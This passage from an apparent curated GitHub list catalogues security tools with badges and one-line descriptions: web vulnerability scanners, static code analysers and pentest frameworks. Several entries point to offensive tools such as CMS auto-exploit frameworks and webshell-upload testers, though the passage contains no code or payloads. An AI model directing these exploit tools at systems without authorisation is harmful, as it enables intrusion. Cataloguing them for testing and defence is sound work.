![GitHub](https://img.shields.io/github/license/kotobukki/BDA?style=flat-square)\n\n- https://github.com/jagracey/Regex-DoS - **RegEx Denial of service scanner for Node.js package**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Node.js-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/jagracey/Regex-DoS?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/jagracey/Regex-DoS?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/jagracey/Regex-DoS?style=flat-square) ![GitHub](https://img.shields.io/github/license/jagracey/Regex-DoS?style=flat-square)\n\n- https://github.com/milesrichardson/docker-onion-nmap - **Scan .onion hidden services with nmap using Tor, proxychains and dnsmasq**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Bash-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/milesrichardson/docker-onion-nmap?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/milesrichardson/docker-onion-nmap?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/milesrichardson/docker-onion-nmap?style=flat-square) ![GitHub](https://img.shields.io/github/license/milesrichardson/docker-onion-nmap?style=flat-square)\n\n- https://github.com/Moham3dRiahi/XAttacker - **Web CMS exploit framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Perl-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Moham3dRiahi/XAttacker?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Moham3dRiahi/XAttacker?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Moham3dRiahi/XAttacker?style=flat-square) ![GitHub](https://img.shields.io/github/license/Moham3dRiahi/XAttacker?style=flat-square)\n\n- https://github.com/lijiejie/BBScan - **A tiny batch web vulnerability scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lijiejie/BBScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lijiejie/BBScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lijiejie/BBScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/lijiejie/BBScan?style=flat-square)\n\n- https://github.com/almandin/fuxploider - **File upload vulnerability scanner and exploitation tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/almandin/fuxploider?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/almandin/fuxploider?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/almandin/fuxploider?style=flat-square) ![GitHub](https://img.shields.io/github/license/almandin/fuxploider?style=flat-square)\n\n- https://github.com/Jamalc0m/wphunter - **A Wordpress vulnerability scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Jamalc0m/wphunter?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Jamalc0m/wphunter?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Jamalc0m/wphunter?style=flat-square) ![GitHub](https://img.shields.io/github/license/Jamalc0m/wphunter?style=flat-square)\n\n- https://github.com/retirejs/retire.js - **A scanner detecting the use of Javascript libraries with known vulnerabilities**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Node.js-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/retirejs/retire.js?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/retirejs/retire.js?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/retirejs/retire.js?style=flat-square) ![GitHub](https://img.shields.io/github/license/retirejs/retire.js?style=flat-square)\n\n- https://github.com/3xp10it/xupload - **A tool for automatically testing whether the upload function can upload webshell**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/3xp10it/xupload?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/3xp10it/xupload?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/3xp10it/xupload?style=flat-square) ![GitHub](https://img.shields.io/github/license/3xp10it/xupload?style=flat-square)\n\n- https://github.com/rezasp/vbscan - **OWASP VBScan is a Black Box vBulletin vulnerability scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Perl-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/rezasp/vbscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/rezasp/vbscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/rezasp/vbscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/rezasp/vbscan?style=flat-square)\n\n- https://github.com/MrSqar-Ye/BadMod - **Detect websites CMS & auto exploit**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/MrSqar-Ye/BadMod?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/MrSqar-Ye/BadMod?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/MrSqar-Ye/BadMod?style=flat-square) ![GitHub](https://img.shields.io/github/license/MrSqar-Ye/BadMod?style=flat-square)\n\n- https://github.com/Tuhinshubhra/CMSeeK - **CMS detection and exploitation suite**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Tuhinshubhra/CMSeeK?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Tuhinshubhra/CMSeeK?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Tuhinshubhra/CMSeeK?style=flat-square) ![GitHub](https://img.shields.io/github/license/Tuhinshubhra/CMSeeK?style=flat-square)\n\n- https://github.com/cloudsploit/scans - **AWS security scanning checks**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Node.js-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/cloudsploit/scans?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/cloudsploit/scans?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/cloudsploit/scans?style=flat-square) ![GitHub](https://img.shields.io/github/license/cloudsploit/scans?style=flat-square)\n\n- https://github.com/radenvodka/SVScanner - **Scanner vulnerability and massive exploit for Wordpress,Magento,Joomla and so on**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Perl-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/radenvodka/SVScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/radenvodka/SVScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/radenvodka/SVScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/radenvodka/SVScanner?style=flat-square)\n\n- https://github.com/rezasp/joomscan - **OWASP Joomla vulnerability scanner project**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Perl-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/rezasp/joomscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/rezasp/joomscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/rezasp/joomscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/rezasp/joomscan?style=flat-square)\n\n- https://github.com/6IX7ine/djangohunter - **Tool designed to help identify incorrectly configured Django applications that are exposing sensitive information**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/6IX7ine/djangohunter?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/6IX7ine/djangohunter?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/6IX7ine/djangohunter?style=flat-square) ![GitHub](https://img.shields.io/github/license/6IX7ine/djangohunter?style=flat-square)\n\n- https://github.com/vulmon/Vulmap - **Local vulnerability scanning programs for Windows and Linux operating systems**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PowerShell-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/vulmon/Vulmap?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/vulmon/Vulmap?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/vulmon/Vulmap?style=flat-square) ![GitHub](https://img.shields.io/github/license/vulmon/Vulmap?style=flat-square)\n\n- https://github.com/seungsoo-lee/DELTA - **Sdn security evaluation framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/seungsoo-lee/DELTA?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/seungsoo-lee/DELTA?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/seungsoo-lee/DELTA?style=flat-square) ![GitHub](https://img.shields.io/github/license/seungsoo-lee/DELTA?style=flat-square)\n\n- https://github.com/anouarbensaad/vulnx - **Intelligent Bot, Shell can achieve automatic injection, and help researchers detect security vulnerabilities CMS system**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/anouarbensaad/vulnx?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/anouarbensaad/vulnx?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/anouarbensaad/vulnx?style=flat-square) ![GitHub](https://img.shields.io/github/license/anouarbensaad/vulnx?style=flat-square)\n\n- https://github.com/MrEmpy/Mantra - **A tool used to hunt down API key leaks in JS files and pages**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/MrEmpy/Mantra?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/MrEmpy/Mantra?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/MrEmpy/Mantra?style=flat-square) ![GitHub](https://img.shields.io/github/license/MrEmpy/Mantra?style=flat-square)\n\n\n### Dynamic or Static Code Analysis\n\n- https://github.com/wufeifei/cobra - **A static code analysis system that automates the detecting vulnerabilities and security issue**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/wufeifei/cobra?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/wufeifei/cobra?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/wufeifei/cobra?style=flat-square) ![GitHub](https://img.shields.io/github/license/wufeifei/cobra?style=flat-square)\n\n- https://github.com/OneSourceCat/phpvulhunter - **A tool that can scan php vulnerabilities automatically using static analysis methods**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/OneSourceCat/phpvulhunter?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/OneSourceCat/phpvulhunter?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/OneSourceCat/phpvulhunter?style=flat-square) ![GitHub](https://img.shields.io/github/license/OneSourceCat/phpvulhunter?style=flat-square)\n\n- https://github.com/Qihoo360/phptrace - **A tracing and troubleshooting tool for PHP scripts**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Qihoo360/phptrace?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Qihoo360/phptrace?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Qihoo360/phptrace?style=flat-square) ![GitHub](https://img.shields.io/github/license/Qihoo360/phptrace?style=flat-square)\n\n- https://github.com/ajinabraham/NodeJsScan - **A static security code scanner for Node.js applications**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ajinabraham/NodeJsScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ajinabraham/NodeJsScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ajinabraham/NodeJsScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/ajinabraham/NodeJsScan?style=flat-square)\n\n- https://github.com/shengqi158/pyvulhunter - **A static security code scanner for Python applications**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shengqi158/pyvulhunter?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shengqi158/pyvulhunter?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shengqi158/pyvulhunter?style=flat-square) ![GitHub](https://img.shields.io/github/license/shengqi158/pyvulhunter?style=flat-square)\n\n- https://github.com/python-security/pyt - **A static analysis tool for detecting security vulnerabilities in Python web applications**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/python-security/pyt?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/python-security/pyt?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/python-security/pyt?style=flat-square) ![GitHub](https://img.shields.io/github/license/python-security/pyt?style=flat-square)\n\n- https://github.com/emanuil/php-reaper - **PHP tool to scan ADOdb code for SQL injections**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/emanuil/php-reaper?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/emanuil/php-reaper?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/emanuil/php-reaper?style=flat-square) ![GitHub](https://img.shields.io/github/license/emanuil/php-reaper?style=flat-square)\n\n- https://github.com/lowjoel/phortress - **A PHP static code analyser for potential vulnerabilities**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lowjoel/phortress?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lowjoel/phortress?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lowjoel/phortress?style=flat-square) ![GitHub](https://img.shields.io/github/license/lowjoel/phortress?style=flat-square)\n\n- https://github.com/zsdlove/Hades - **A Java static code auditing system**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/zsdlove/Hades?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/zsdlove/Hades?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/zsdlove/Hades?style=flat-square) ![GitHub](https://img.shields.io/github/license/zsdlove/Hades?style=flat-square)\n\n- https://github.com/LoRexxar/Kunlun-M - **Static code auditing system for PHP/JavaScript/Chrome EXT**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/LoRexxar/Kunlun-M?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/LoRexxar/Kunlun-M?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/LoRexxar/Kunlun-M?style=flat-square) ![GitHub](https://img.shields.io/github/license/LoRexxar/Kunlun-M?style=flat-square)\n\n- https://github.com/PyCQA/bandit - **A tool designed to find common security issues in Python code**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/PyCQA/bandit?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/PyCQA/bandit?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/PyCQA/bandit?style=flat-square) ![GitHub](https://img.shields.io/github/license/PyCQA/bandit?style=flat-square)\n\n- https://github.com/praetorian-inc/gokart - **A static analysis tool for securing Go code**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/praetorian-inc/gokart?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/praetorian-inc/gokart?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/praetorian-inc/gokart?style=flat-square) ![GitHub](https://img.shields.io/github/license/praetorian-inc/gokart?style=flat-square)\n\n- https://github.com/wh1t3p1g/tabby - **A static analysis tool for Java**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/wh1t3p1g/tabby?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/wh1t3p1g/tabby?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/wh1t3p1g/tabby?style=flat-square) ![GitHub](https://img.shields.io/github/license/wh1t3p1g/tabby?style=flat-square)\n\n- https://github.com/CoolerVoid/codecat - **The tool to help you find/track user input sinks and security bugs in Java, C++,GO, Python, javascript, Swift etc. with regex rules**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/CoolerVoid/codecat?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/CoolerVoid/codecat?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/CoolerVoid/codecat?style=flat-square) ![GitHub](https://img.shields.io/github/license/CoolerVoid/codecat?style=flat-square)\n\n- https://github.com/qax-os/goreporter - **A Golang tool that does static analysis, unit testing, code review and generate code quality report**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/qax-os/goreporter?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/qax-os/goreporter?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/qax-os/goreporter?style=flat-square) ![GitHub](https://img.shields.io/github/license/qax-os/goreporter?style=flat-square)\n\n- https://github.com/hudangwei/codemillx - **CodeQL tool for Go programs**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/hudangwei/codemillx?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/hudangwei/codemillx?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/hudangwei/codemillx?style=flat-square) ![GitHub](https://img.shields.io/github/license/hudangwei/codemillx?style=flat-square)\n\n- https://github.com/securego/gosec - **Inspects source code for security problems by scanning the Go AST**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/securego/gosec?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/securego/gosec?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/securego/gosec?style=flat-square) ![GitHub](https://img.shields.io/github/license/securego/gosec?style=flat-square)\n\n\n### Modular Design Scanners or Vulnerability Detecting Framework\n\n- https://github.com/infobyte/faraday - **Collaborative penetration test and vulnerability management platform**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/infobyte/faraday?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/infobyte/faraday?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/infobyte/faraday?style=flat-square) ![GitHub](https://img.shields.io/github/license/infobyte/faraday?style=flat-square)\n\n- https://github.com/az0ne/AZScanner - **Automatic all-around scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/az0ne/AZScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/az0ne/AZScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/az0ne/AZScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/az0ne/AZScanner?style=flat-square)\n\n- https://github.com/blackye/lalascan - **Distributed web vulnerability scanning framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/blackye/lalascan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/blackye/lalascan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/blackye/lalascan?style=flat-square) ![GitHub](https://img.shields.io/github/license/blackye/lalascan?style=flat-square)\n\n- https://github.com/blackye/BkScanner - **Distributed, plug-in web vulnerability scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/blackye/BkScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/blackye/BkScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/blackye/BkScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/blackye/BkScanner?style=flat-square)\n\n- https://github.com/ysrc/GourdScanV2 - **Passive vulnerability scanning system**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ysrc/GourdScanV2?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ysrc/GourdScanV2?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ysrc/GourdScanV2?style=flat-square) ![GitHub](https://img.shields.io/github/license/ysrc/GourdScanV2?style=flat-square)\n\n- https://github.com/netxfly/passive_scan - **Realization of web vulnerability scanner based on http proxy**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/netxfly/passive_scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/netxfly/passive_scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/netxfly/passive_scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/netxfly/passive_scan?style=flat-square)\n\n- https://github.com/1N3/Sn1per - **Automated pentest recon scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/1N3/Sn1per?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/1N3/Sn1per?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/1N3/Sn1per?style=flat-square) ![GitHub](https://img.shields.io/github/license/1N3/Sn1per?style=flat-square)\n\n- https://github.com/RASSec/pentestEr_Fully-automatic-scanner - **Directional fully automated penetration testing**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/RASSec/pentestEr_Fully-automatic-scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/RASSec/pentestEr_Fully-automatic-scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/RASSec/pentestEr_Fully-automatic-scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/RASSec/pentestEr_Fully-automatic-scanner?style=flat-square)\n\n- https://github.com/Xyntax/POC-T - **Penetration test plug-in concurrency framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Xyntax/POC-T?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Xyntax/POC-T?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Xyntax/POC-T?style=flat-square) ![GitHub](https://img.shields.io/github/license/Xyntax/POC-T?style=flat-square)\n\n- https://github.com/v3n0m-Scanner/V3n0M-Scanner - **Scanner in Python3.5 for SQLi/XSS/LFI/RFI and other vulns**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/v3n0m-Scanner/V3n0M-Scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/v3n0m-Scanner/V3n0M-Scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/v3n0m-Scanner/V3n0M-Scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/v3n0m-Scanner/V3n0M-Scanner?style=flat-square)\n\n- https://github.com/Skycrab/leakScan - **Multiple vuls scan supports web interface**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Skycrab/leakScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Skycrab/leakScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Skycrab/leakScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/Skycrab/leakScan?style=flat-square)\n\n- https://github.com/zhangzhenfeng/AnyScan - **A automated penetration testing framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/zhangzhenfeng/AnyScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/zhangzhenfeng/AnyScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/zhangzhenfeng/AnyScan?style=flat-square) 